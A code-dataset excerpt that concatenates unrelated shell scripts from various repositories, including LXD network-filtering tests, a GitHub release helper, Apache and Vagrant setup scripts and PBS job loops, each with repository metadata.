echo "Shouldn't be able to unset IPv4 address with ipv4_filtering enabled and DHCPv4 disabled"
fi
if lxc config device unset "${ctPrefix}A" eth0 ipv6.address ; then
echo "Shouldn't be able to unset IPv6 address with ipv4_filtering enabled and DHCPv6 disabled"
fi
# Delete container and check filters are cleaned up.
lxc delete -f "${ctPrefix}A"
if [ "$firewallDriver" = "xtables" ]; then
if ebtables --concurrent -L --Lmac2 --Lx | grep -e "${ctAHost}" ; then
echo "ebtables filter still applied after delete"
false
fi
else
for table in "in" "fwd"
do
if nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "${ctAHost}"; then
echo "nftables filter still applied after delete (${table}.${ctPrefix}A.eth0)"
false
fi
done
fi
# Test MAC filtering on unmanaged bridge.
ip link add "${brName}2" type bridge
ip a add 192.0.2.1/24 dev "${brName}2"
ip a add 2001:db8::1/64 dev "${brName}2"
ip link set "${brName}2" up
lxc init testimage "${ctPrefix}A" -p "${ctPrefix}"
lxc config device add "${ctPrefix}A" eth0 nic \
nictype=nic \
name=eth0 \
nictype=bridged \
parent="${brName}2" \
security.mac_filtering=true
lxc start "${ctPrefix}A"
# Check MAC filter is present in firewall.
ctAHost=$(lxc config get "${ctPrefix}A" volatile.eth0.host_name)
ctAMAC=$(lxc config get "${ctPrefix}A" volatile.eth0.hwaddr)
if [ "$firewallDriver" = "xtables" ]; then
if ! ebtables --concurrent -L --Lmac2 --Lx | grep -e "-s ! ${ctAMAC} -i ${ctAHost} -j DROP" ; then
echo "MAC ebtables filter not applied as part of mac_filtering in ebtables"
false
fi
else
macHex=$(echo "${ctAMAC}" |sed "s/://g")
macDec=$(printf "%d" 0x"${macHex}")
for table in "in" "fwd"
do
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" ether saddr != ${ctAMAC} drop"; then
echo "MAC filter not applied as part of mac_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" arp saddr ether != ${ctAMAC} drop"; then
echo "MAC ARP filter not applied as part of mac_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" icmpv6 type 136 @nh,528,48 != ${macDec} drop"; then
echo "MAC NDP filter not applied as part of mac_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
done
fi
# Stop container and check filters are cleaned up.
lxc stop -f "${ctPrefix}A"
if [ "$firewallDriver" = "xtables" ]; then
if ebtables --concurrent -L --Lmac2 --Lx | grep -e "${ctAHost}" ; then
echo "MAC filter still applied as part of mac_filtering in ebtables"
false
fi
else
for table in "in" "fwd"
do
if nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "${ctAHost}"; then
echo "MAC filter still applied as part of mac_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
done
fi
# Check IP filtering cannot be enabled without manual IP assigned in LXD config.
! lxc config device set "${ctPrefix}A" eth0 security.ipv4_filtering=true || false
lxc config device set "${ctPrefix}A" eth0 ipv4.address=192.0.2.2 security.ipv4_filtering=true
! lxc config device set "${ctPrefix}A" eth0 security.ipv6_filtering=true || false
lxc config device set "${ctPrefix}A" eth0 ipv6.address=2001:db8::2 security.ipv6_filtering=true
lxc start "${ctPrefix}A"
lxc exec "${ctPrefix}A" -- ip a add 192.0.2.2/24 dev eth0
lxc exec "${ctPrefix}A" -- ip a add 2001:db8::2/64 dev eth0
# Check basic connectivity without any filtering.
lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.1
lxc exec "${ctPrefix}A" -- ping -c2 -W1 2001:db8::1
# Check fraudulent IPs are blocked.
lxc exec "${ctPrefix}A" -- ip a flush dev eth0
lxc exec "${ctPrefix}A" -- ip a add 192.0.2.3/24 dev eth0
lxc exec "${ctPrefix}A" -- ip a add 2001:db8::3/64 dev eth0
! lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.1 || false
! lxc exec "${ctPrefix}A" -- ping -c2 -W1 2001:db8::1 || false
lxc delete -f "${ctPrefix}A"
ip link delete "${brName}2"
# Check filtering works with no IP addresses (total protocol blocking).
lxc network set "${brName}" ipv4.dhcp false
lxc network set "${brName}" ipv4.address none
lxc network set "${brName}" ipv6.dhcp false
lxc network set "${brName}" ipv6.address none
lxc network set "${brName}" ipv6.dhcp.stateful false
lxc init testimage "${ctPrefix}A" -p "${ctPrefix}"
lxc config device add "${ctPrefix}A" eth0 nic \
nictype=nic \
name=eth0 \
nictype=bridged \
parent="${brName}" \
security.ipv4_filtering=true \
security.ipv6_filtering=true
lxc start "${ctPrefix}A"
ctAHost=$(lxc config get "${ctPrefix}A" volatile.eth0.host_name)
if [ "$firewallDriver" = "xtables" ]; then
ebtables --concurrent -L --Lmac2 --Lx | grep -e "-A INPUT -p ARP -i ${ctAHost} -j DROP"
ebtables --concurrent -L --Lmac2 --Lx | grep -e "-A FORWARD -p ARP -i ${ctAHost} -j DROP"
ebtables --concurrent -L --Lmac2 --Lx | grep -e "-A INPUT -p IPv4 -i ${ctAHost} -j DROP"
ebtables --concurrent -L --Lmac2 --Lx | grep -e "-A FORWARD -p IPv4 -i ${ctAHost} -j DROP"
ebtables --concurrent -L --Lmac2 --Lx | grep -e "-A INPUT -p IPv6 -i ${ctAHost} -j DROP"
ebtables --concurrent -L --Lmac2 --Lx | grep -e "-A FORWARD -p IPv6 -i ${ctAHost} -j DROP"
else
for table in "in" "fwd"
do
nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "iifname \"${ctAHost}\" ether type 0x0806 drop" # ARP
nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "iifname \"${ctAHost}\" ether type 0x0800 drop" # IPv4
nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "iifname \"${ctAHost}\" ether type 0x86dd drop" # IPv6
done
fi
# Delete container and check filters are cleaned up.
lxc delete -f "${ctPrefix}A"
if [ "$firewallDriver" = "xtables" ]; then
if ebtables --concurrent -L --Lmac2 --Lx | grep -e "${ctAHost}" ; then
echo "Filters still applied as part of IP filter in ebtables"
false
fi
else
for table in "in" "fwd"
do
if nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "${ctAHost}"; then
echo "Filters still applied as part of IP filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
done
fi
# Cleanup.
lxc profile delete "${ctPrefix}"
lxc network delete "${brName}"
# Check we haven't left any NICS lying around.
endNicCount=$(find /sys/class/net | wc -l)
if [ "$startNicCount" != "$endNicCount" ]; then
echo "leftover NICS detected"
false
fi
}
|
atxwebs/lxd
|
test/suites/container_devices_nic_bridged_filtering.sh
|
Shell
|
apache-2.0
| 29,601 |
#!/bin/bash
#
# Run the full test suite.
#
# Copyright 2015 Andrew Dawson, Peter Dueben
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -u
# List of all the test suites that should be run.
readonly RUN_SUITES="unit integration"
# Define a mapping between test suite names and executables.
readonly UNIT_EXE="unit/unittests.x"
readonly INTEGRATION_EXE="integration/inttests.sh"
declare -A SUITE_MAP
SUITE_MAP["unit"]="${UNIT_EXE}"
SUITE_MAP["integration"]="${INTEGRATION_EXE}"
# Function to append a line to a variable.
appendline () {
if [ -z "$1" ]; then echo "$2"; else echo "${1}\n${2}"; fi
}
main () {
local status=0
local suite
local suite_status
local suite_info
local messages=""
echo "========================================================================"
echo "Running master test suite"
echo "========================================================================"
for suite in ${RUN_SUITES}; do
echo
echo "------------------------------------------------------------------------"
echo "Running suite: '$suite'"
echo "------------------------------------------------------------------------"
"${SUITE_MAP["${suite}"]}"
suite_status=$?
suite_info=" suite: '${suite}'"
if [ ${suite_status} -ne 0 ]; then
messages=$(appendline "${messages}" "${suite_info} FAILED")
status=$(( status + 1 ))
else
messages=$(appendline "${messages}" "${suite_info} PASSED")
fi
done
echo
echo "========================================================================"
echo "Summary:"
echo "========================================================================"
echo -e "${messages}"
return $status
}
main $@
|
aopp-pred/rpe
|
test/runtests.sh
|
Shell
|
apache-2.0
| 2,297 |
#!/bin/bash
# sample script with virtualenv
# configure crontab to run this script
cd "$(dirname "$0")"
source $HOME/.virtualenvs/python2.7/bin/activate
python script.py
|
z0lope0z/cheathub
|
run.sh
|
Shell
|
apache-2.0
| 170 |
#!/bin/bash
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Usage:
# $ release.sh [-f] <organization/project-name> [<new-version>]
#
# Args:
# organization/project-name Required. The GitHub repo to release.
# new-version Optional. The new version number to use,
# specified as M.N.0. If not specified, the
# new version will be computed from existing
# git tags. This flag should only be needed
# when jumping to a non-sequential version
# number.
#
# Options:
# -f Force; actually make and push the changes
# -h Print help message
#
# This script creates a "release" on github by doing the following:
#
# 1. Computes the next version to use, if not specified on the command line
# 2. Creates and pushes the tag w/ the new version
# 3. Creates and pushes a new branch w/ the new version
# 4. Creates the "Pre-Release" in the GitHub UI.
#
# Before running this script the user should make sure the CHANGELOG.md on
# main is up-to-date with the release notes for the new release that will
# happen. Then run this script. After running this script, the user must still
# go to the GH UI where the new release will exist as a "pre-release", confirm
# that everything looks OK, then mark the release as not pre-release.
#
# Examples:
#
# # NO CHANGES ARE PUSHED. Shows what commands would be run.
# $ release.sh googleapis/google-cloud-cpp
#
# # NO CHANGES ARE PUSHED. Shows what commands would be run.
# $ release.sh googleapis/google-cloud-cpp 2.0.0
#
# # PUSHES CHANGES.
# $ release.sh -f googleapis/google-cloud-cpp
#
# # PUSHES CHANGES to your fork
# $ release.sh -f <my-gh-username>/google-cloud-cpp
set -euo pipefail
# Extracts all the documentation at the top of this file as the usage text.
USAGE="$(sed -n '17,/^$/s/^# \?//p' "$0")"
readonly USAGE
# Takes an optional list of strings to be printed with a trailing newline and
# exits the program with code 1
function die_with_message() {
for m in "$@"; do
echo "$m" 1>&2
done
exit 1
}
FORCE_FLAG="no"
while getopts "fh" opt "$@"; do
case "$opt" in
[f])
FORCE_FLAG="yes"
;;
[h])
echo "${USAGE}"
exit 0
;;
*)
die_with_message "${USAGE}"
;;
esac
done
shift $((OPTIND - 1))
declare -r FORCE_FLAG
REPO_ARG=""
VERSION_ARG=""
if [[ $# -eq 1 ]]; then
REPO_ARG="$1"
elif [[ $# -eq 2 ]]; then
REPO_ARG="$1"
VERSION_ARG="$2"
else
die_with_message "Invalid arguments" "${USAGE}"
fi
declare -r REPO_ARG
declare -r VERSION_ARG
readonly CLONE_URL="[email protected]:${REPO_ARG}"
TMP_DIR="$(mktemp -d "/tmp/${REPO_ARG//\//-}-release.XXXXXXXX")"
readonly TMP_DIR
readonly REPO_DIR="${TMP_DIR}/repo"
function banner() {
local color
color=$(
tput bold
tput setaf 4
tput rev
)
local reset
reset=$(tput sgr0)
echo "${color}$*${reset}"
}
function run() {
printf "#"
printf " %q" "$@"
printf "\n"
if [[ "${FORCE_FLAG}" == "yes" ]]; then
"$@"
fi
}
# Outputs the release notes for the given tag. Looks for the release notes in
# the CHANGELOG.md file starting at a heading that looks like "## <tag>", and
# ending at the next heading that looks like `##` with a version number. For
# example `get_release_notes v0.6.0` would look for a line like "## v0.6.0" and
# stop at "## v0.5.0".
function get_release_notes() {
local tag="$1"
local begin="^## ${tag}"
local end="^## v[0-9]+\.[0-9]+\.[0-9]"
local notes
# Note: the use of command substitution here removes trailing blank lines
notes="$(awk "/${begin}/ {x=1; next} /${end}/ { x=0 } x" CHANGELOG.md)"
# Removes leading blank lines
sed '/./,$!d' <<<"${notes}"
}
function exit_handler() {
if [[ -d "${TMP_DIR}" ]]; then
banner "OOPS! Unclean shutdown"
echo "Local repo at ${REPO_DIR}"
echo 1
fi
}
trap exit_handler EXIT
# We use github's official `gh` command to create the release on on the GH
# website, so we make sure it's installed early on so we don't fail after
# completing part of the release.
if ! command -v gh >/dev/null; then
die_with_message \
"Can't find 'gh' command." \
"You can build from source or download a binary from" \
"https://github.com/cli/cli"
fi
# Makes sure auth works, else fails
gh auth status
banner "Starting release for ${REPO_ARG} (${CLONE_URL})"
# Only clones the last 90 days worth of commits, which should be more than
# enough to get the most recent release tags.
SINCE="$(date --date="90 days ago" +"%Y-%m-%d")"
readonly SINCE
git clone --tags --shallow-since="${SINCE}" "${CLONE_URL}" "${REPO_DIR}"
cd "${REPO_DIR}"
# Figures out the most recent tagged version, and computes the next version.
TAG="$(git describe --tags --abbrev=0 origin/main)"
readonly TAG
CUR_TAG="$(test -n "${TAG}" && echo "${TAG}" || echo "v0.0.0")"
readonly CUR_TAG
readonly CUR_VERSION="${CUR_TAG#v}"
NEW_VERSION=""
if [[ -n "${VERSION_ARG}" ]]; then
NEW_VERSION="${VERSION_ARG}"
else
# Compute the new version by incrementing the minor number.
NEW_VERSION="$(awk -F. '{printf "%d.%d.%d", $1, $2+1, $3}' <<<"${CUR_VERSION}")"
fi
declare -r NEW_VERSION
# Avoid handling patch releases for now, because we wouldn't need a new branch
# for those.
if ! grep -P "\d+\.\d+\.0" <<<"${NEW_VERSION}" >/dev/null; then
die_with_message "Sorry, cannot handle patch releases (yet)" "${USAGE}"
fi
readonly NEW_TAG="v${NEW_VERSION}"
readonly NEW_BRANCH="${NEW_TAG%.0}.x"
banner "Release info for ${CUR_TAG} -> ${NEW_TAG}"
echo " New tag: ${NEW_TAG}"
echo " New branch: ${NEW_BRANCH}"
banner "Creating and pushing tag ${NEW_TAG}"
run git tag "${NEW_TAG}"
run git push origin "${NEW_TAG}"
banner "Creating and pushing branch ${NEW_BRANCH}"
run git checkout -b "${NEW_BRANCH}" "${NEW_TAG}"
run git push --set-upstream origin "${NEW_BRANCH}"
banner "Getting release notes for ${NEW_TAG}"
RELEASE_NOTES="$(get_release_notes "${NEW_TAG}")"
readonly RELEASE_NOTES
echo "got release notes"
banner "Creating release"
run gh -R "${REPO_ARG}" release create \
--prerelease \
--title="${NEW_TAG}" \
--notes-file=<(printf "%s" "${RELEASE_NOTES}") \
"${NEW_TAG}"
banner "Success!"
run gh -R "${REPO_ARG}" release view "${NEW_TAG}"
# Clean up
if [[ "${TMP_DIR}" == /tmp/* ]]; then
rm -rf "${TMP_DIR}"
fi
|
googleapis/google-cloud-cpp
|
release/release.sh
|
Shell
|
apache-2.0
| 6,943 |
#!/bin/sh
# variables used for logging build steps, use build_step() and
# build_step_done() for setting or clearing them.
BUILD_STEP_FILE="$(mktemp)"
BUILD_STEP_PID=''
BUILD_STEP_DELAY='1m'
build_step_log() {
echo "$(date) -- ${*}"
}
# start a build step, and log every
build_step() {
echo "${*}" > "${BUILD_STEP_FILE}"
build_step_log "starting: $(cat "${BUILD_STEP_FILE}")"
[ -n "${BUILD_STEP_PID}" ] && return
while sleep "${BUILD_STEP_DELAY}"
do
build_step_log "running: $(cat "${BUILD_STEP_FILE}")"
done & BUILD_STEP_PID=${!}
}
# clean up the logging of build steps
build_steps_cleanup() {
[ -n "${BUILD_STEP_PID}" ] && kill "${BUILD_STEP_PID}"
rm -f "${BUILD_STEP_FILE}"
BUILD_STEP_PID=''
}
# automatically stop build step logging and cleanup temporary file
trap build_steps_cleanup EXIT
|
ceph/ceph-csi
|
scripts/build_step.inc.sh
|
Shell
|
apache-2.0
| 812 |
#!/bin/bash
current_dir=$(dirname "$0")
exec "$SPLUNK_HOME/bin/splunk" cmd node "$current_dir/app/socketio_app.js" $@
|
glennblock/splunk-add-on-for-socketio
|
bin/socketio.sh
|
Shell
|
apache-2.0
| 119 |
docker build -t="gustavonalle/jgroups-gossip" .
|
gustavonalle/jgroups-gossip-docker
|
build.sh
|
Shell
|
apache-2.0
| 48 |
#!/bin/bash
# Copyright 2016 Port Direct
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -e
echo "${OS_DISTRO}: Configuring quotas"
################################################################################
. /etc/os-container.env
. /opt/harbor/service-hosts.sh
. /opt/harbor/harbor-common.sh
. /opt/harbor/neutron/vars.sh
################################################################################
check_required_vars NEUTRON_CONFIG_FILE \
OS_DOMAIN
################################################################################
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS default_quota "-1"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_driver "neutron.db.quota.driver.DbQuotaDriver"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_floatingip "50"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_health_monitor "-1"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_healthmonitor "-1"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_listener "-1"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_loadbalancer "50"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_member "-1"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_network "100"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_pool "100"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_port "500"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_rbac_policy "10"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_router "10"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_security_group "100"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_security_group_rule "1000"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_subnet "100"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS quota_vip "100"
crudini --set ${NEUTRON_CONFIG_FILE} QUOTAS track_quota_usage "True"
|
portdirect/harbor
|
docker/openstack/openstack-neutron/common-assets/opt/harbor/neutron/config-quota.sh
|
Shell
|
apache-2.0
| 2,285 |
#!/bin/bash
#
# Copyright 2018, LambdaStack
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Exit immediately if anything goes wrong, instead of making things worse.
set -e
# Important
source $REPO_ROOT/bootstrap/vagrant/vbox_functions.sh
source $REPO_ROOT/bootstrap/common/base.sh
source $REPO_ROOT/bootstrap/common/base_colors.sh
function update_network_interfaces {
echo_yellow ${CEPH_CHEF_HOSTS[@]}
echo_yellow '---------------------------------------------'
# set +e
for vm in ${CEPH_CHEF_HOSTS[@]}; do
node_update_network_interfaces $vm
done
# set -e
}
# This function calls a function by the same name on the given node to update the interfaces
function node_update_network_interfaces {
local node=$1
echo_yellow "====> $node (vagrant_create - node_update_network_interfaces)..."
echo_yellow "====> $node => . vbox_network.sh && node_update_network_interfaces"
vagrant ssh $node -c ". vbox_network.sh && node_update_network_interfaces"
if [[ $? -ne 0 ]]; then
# Restart VM
vagrant halt $node
vagrant up $node
vagrant ssh $node -c ". vbox_network.sh && node_update_network_interfaces"
fi
echo_yellow "====> $node => . vbox_network.sh && . network_setup.sh && node_update_network_ips"
vagrant ssh $node -c ". vbox_network.sh && . network_setup.sh && node_update_network_ips"
}
###################################################################
# Function to create all VMs using Vagrant
function create_vagrant_vms {
cd $REPO_ROOT/bootstrap/vagrant
echo_orange "====> Shutting down and unregistering VMs from VirtualBox..."
$REPO_ROOT/bootstrap/vagrant/vagrant_clean.sh
ssh-keygen -b 2048 -t rsa -f $REPO_ROOT/bootstrap/vagrant/cepheus -q -N ""
if [[ $BOOTSTRAP_VAGRANT_DEBUG -eq 0 ]]; then
vagrant up
else
vagrant up --debug
fi
echo
echo_green "===================================="
echo_green "====> Initial Vagrant Complete <===="
echo_green "===================================="
echo
export BOOTSTRAP_LAST_COMPLETE=2
}
# Only execute functions if being run and not sourced
if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then
remove_DHCPservers
if [[ $BOOTSTRAP_SKIP_VMS -eq 0 ]]; then
create_vagrant_vms
fi
# These files are created during the vagrant build 'create_vagrant_vms' and reside in the vagrant_scripts directory
source $REPO_ROOT/environments/ceph_chef_hosts.env
source $REPO_ROOT/bootstrap/vagrant/ceph_chef_adapters.env
source $REPO_ROOT/environments/ceph_chef_bootstrap.env
if [[ $BOOTSTRAP_SKIP_VMS -eq 0 ]]; then
config_networks
fi
fi
|
cepheus-io/cepheus
|
bootstrap/vagrant/vagrant_create.sh
|
Shell
|
apache-2.0
| 3,138 |
#!/bin/bash
rm -rf httpd-2.4.10 apr-1.5.0 apr-util-1.5.3
if [ ! -f httpd-2.4.10.tar.gz ];then
wget http://zy-res.oss-cn-hangzhou.aliyuncs.com/httpd/httpd-2.4.10.tar.gz
fi
tar zxvf httpd-2.4.10.tar.gz
if [ ! -f apr-1.5.0.tar.gz ];then
wget http://oss.aliyuncs.com/aliyunecs/onekey/apache/apr-1.5.0.tar.gz
fi
tar -zxvf apr-1.5.0.tar.gz
cp -rf apr-1.5.0 httpd-2.4.10/srclib/apr
if [ ! -f apr-util-1.5.3.tar.gz ];then
wget http://oss.aliyuncs.com/aliyunecs/onekey/apache/apr-util-1.5.3.tar.gz
fi
tar -zxvf apr-util-1.5.3.tar.gz
cp -rf apr-util-1.5.3 httpd-2.4.10/srclib/apr-util
cd httpd-2.4.10
./configure --prefix=/alidata/server/httpd \
--with-mpm=prefork \
--enable-so \
--enable-rewrite \
--enable-mods-shared=all \
--enable-nonportable-atomics=yes \
--disable-dav \
--enable-deflate \
--enable-cache \
--enable-disk-cache \
--enable-mem-cache \
--enable-file-cache \
--enable-ssl \
--with-included-apr \
--enable-modules=all \
--enable-mods-shared=all
CPU_NUM=$(cat /proc/cpuinfo | grep processor | wc -l)
if [ $CPU_NUM -gt 1 ];then
make -j$CPU_NUM
else
make
fi
make install
cp support/apachectl /etc/init.d/httpd
chmod u+x /etc/init.d/httpd
cd ..
cp /alidata/server/httpd/conf/httpd.conf /alidata/server/httpd/conf/httpd.conf.bak
sed -i "s;#LoadModule rewrite_module modules/mod_rewrite.so;LoadModule rewrite_module modules/mod_rewrite.so\nLoadModule php5_module modules/libphp5.so;" /alidata/server/httpd/conf/httpd.conf
sed -i "s#User daemon#User www#" /alidata/server/httpd/conf/httpd.conf
sed -i "s#Group daemon#Group www#" /alidata/server/httpd/conf/httpd.conf
sed -i "s;#ServerName www.example.com:80;ServerName www.example.com:80;" /alidata/server/httpd/conf/httpd.conf
sed -i "s#/alidata/server/httpd/htdocs#/alidata/www#" /alidata/server/httpd/conf/httpd.conf
sed -i "s#<Directory />#<Directory \"/alidata/www\">#" /alidata/server/httpd/conf/httpd.conf
sed -i "s#AllowOverride None#AllowOverride all#" /alidata/server/httpd/conf/httpd.conf
sed -i "s#DirectoryIndex index.html#DirectoryIndex index.html index.htm index.php#" /alidata/server/httpd/conf/httpd.conf
sed -i "s;#Include conf/extra/httpd-mpm.conf;Include conf/extra/httpd-mpm.conf;" /alidata/server/httpd/conf/httpd.conf
sed -i "s;#Include conf/extra/httpd-vhosts.conf;Include conf/extra/httpd-vhosts.conf;" /alidata/server/httpd/conf/httpd.conf
echo "HostnameLookups off" >> /alidata/server/httpd/conf/httpd.conf
echo "AddType application/x-httpd-php .php" >> /alidata/server/httpd/conf/httpd.conf
echo "Include /alidata/server/httpd/conf/vhosts/*.conf" > /alidata/server/httpd/conf/extra/httpd-vhosts.conf
mkdir -p /alidata/server/httpd/conf/vhosts/
cat > /alidata/server/httpd/conf/vhosts/phpwind.conf << END
<DirectoryMatch "/alidata/www/phpwind/(attachment|html|data)">
<Files ~ ".php">
Order allow,deny
Deny from all
</Files>
</DirectoryMatch>
<VirtualHost *:80>
DocumentRoot /alidata/www/phpwind
ServerName localhost
ServerAlias localhost
<Directory "/alidata/www/phpwind">
Options Indexes FollowSymLinks
AllowOverride all
Order allow,deny
Allow from all
</Directory>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^(.*)-htm-(.*)$ $1.php?$2
RewriteRule ^(.*)/simple/([a-z0-9\_]+\.html)$ $1/simple/index.php?$2
</IfModule>
ErrorLog "/alidata/log/httpd/phpwind-error.log"
CustomLog "/alidata/log/httpd/phpwind.log" common
</VirtualHost>
END
#adjust httpd-mpm.conf
sed -i 's/StartServers 5/StartServers 10/g' /alidata/server/httpd/conf/extra/httpd-mpm.conf
sed -i 's/MinSpareServers 5/MinSpareServers 10/g' /alidata/server/httpd/conf/extra/httpd-mpm.conf
sed -i 's/MaxSpareServers 10/MaxSpareServers 30/g' /alidata/server/httpd/conf/extra/httpd-mpm.conf
sed -i 's/MaxRequestWorkers 150/MaxRequestWorkers 255/g' /alidata/server/httpd/conf/extra/httpd-mpm.conf
/etc/init.d/httpd start
|
HollenMok/pandoraf_v1.0
|
docs/linuxServer/linux_setup_1.4.3/sh-1.4.3/apache/install_httpd-2.4.10.sh
|
Shell
|
apache-2.0
| 3,893 |
#!/bin/sh
#
# used for CI services like Jenkins, Shippable, Travis-CI
#
# variables must be set by CI service
# setup local environment first https://github.com/yafraorg/yafra/wiki/Development-Environment
export BASENODE=/home/shippable/workspace/src/github.com/yafraorg/yapki
export WORKNODE=/work/yafra-runtime
export SYSADM=/work/repos/yafra/org.yafra.sysadm
export YAFRATOOLS=$SYSADM/defaults
export YAFRABIN=$SYSADM/defaults/scripts
export YAFRADOC=$WORKNODE/doc
export YAFRAMAN=$WORKNODE/man
export YAFRAEXE=$WORKNODE/bin
export PATH=$PATH:$YAFRABIN:$YAFRAEXE
echo "YAPKI build starting"
echo "environment is WORKNODE = $WORKNODE - BASENODE = $BASENODE"
test -d $WORKNODE/apps || mkdir -p $WORKNODE/apps
test -d $WORKNODE/bin || mkdir -p $WORKNODE/bin
echo "done - save in /work"
|
yafraorg/yapki
|
build-shippable.sh
|
Shell
|
apache-2.0
| 795 |
#!/bin/bash
# Copyright 2019 - 2020 Crunchy Data Solutions, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
if ! whoami &> /dev/null
then
if [[ -w /etc/passwd ]]
then
sed "/crunchyadm:x:17:/d" /etc/passwd >> /tmp/uid.tmp
cp /tmp/uid.tmp /etc/passwd
rm -f /tmp/uid.tmp
echo "${USER_NAME:-crunchyadm}:x:$(id -u):0:${USER_NAME:-crunchyadm} user:${HOME}:/bin/bash" >> /etc/passwd
fi
if [[ -w /etc/group ]]
then
sed "/crunchyadm:x:17/d" /etc/group >> /tmp/gid.tmp
cp /tmp/gid.tmp /etc/group
rm -f /tmp/gid.tmp
echo "nfsnobody:x:65534:" >> /etc/group
echo "crunchyadm:x:$(id -g):crunchyadm" >> /etc/group
fi
fi
exec $@
|
the1forte/crunchy-containers
|
bin/common/uid_crunchyadm.sh
|
Shell
|
apache-2.0
| 1,211 |
#!/bin/bash
# ===============================================================================
# Copyright 2015 Geoscience Australia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
PBS_SCRIPT="$HOME/source/agdc-api/witl/api-examples/source/main/python/workflow/wetness.pbs.sh"
OUTPUT_DIR="/g/data/u46/sjo/output/wetness/2015-04-17/lower_darling/existing"
#qsub -v outputdir=${OUTPUT_DIR}/2006-2009,xmin=140,xmax=140,ymin=-35,ymax=-35,acqmin=2006,acqmax=2009 ${PBS_SCRIPT}
# Lower Darling
# 2006 - 2009
for x in {140..145}
do
for y in {-36..-30}
do
qsub -v outputdir=${OUTPUT_DIR}/2006-2009,xmin=$x,xmax=$x,ymin=$y,ymax=$y,acqmin=2006,acqmax=2009 ${PBS_SCRIPT}
done
done
# 2010 - 2012
for x in {140..145}
do
for y in {-36..-30}
do
qsub -v outputdir=${OUTPUT_DIR}/2010-2012,xmin=$x,xmax=$x,ymin=$y,ymax=$y,acqmin=2010,acqmax=2012 ${PBS_SCRIPT}
done
done
#Ord
#
#qsub -v outputdir="${OUTPUT_DIR}/ord",xmin=127,xmax=130,ymin=-18,ymax=-14,acqmin=2006,acqmax=2013 "${PBS_SCRIPT}"
#
#TODO
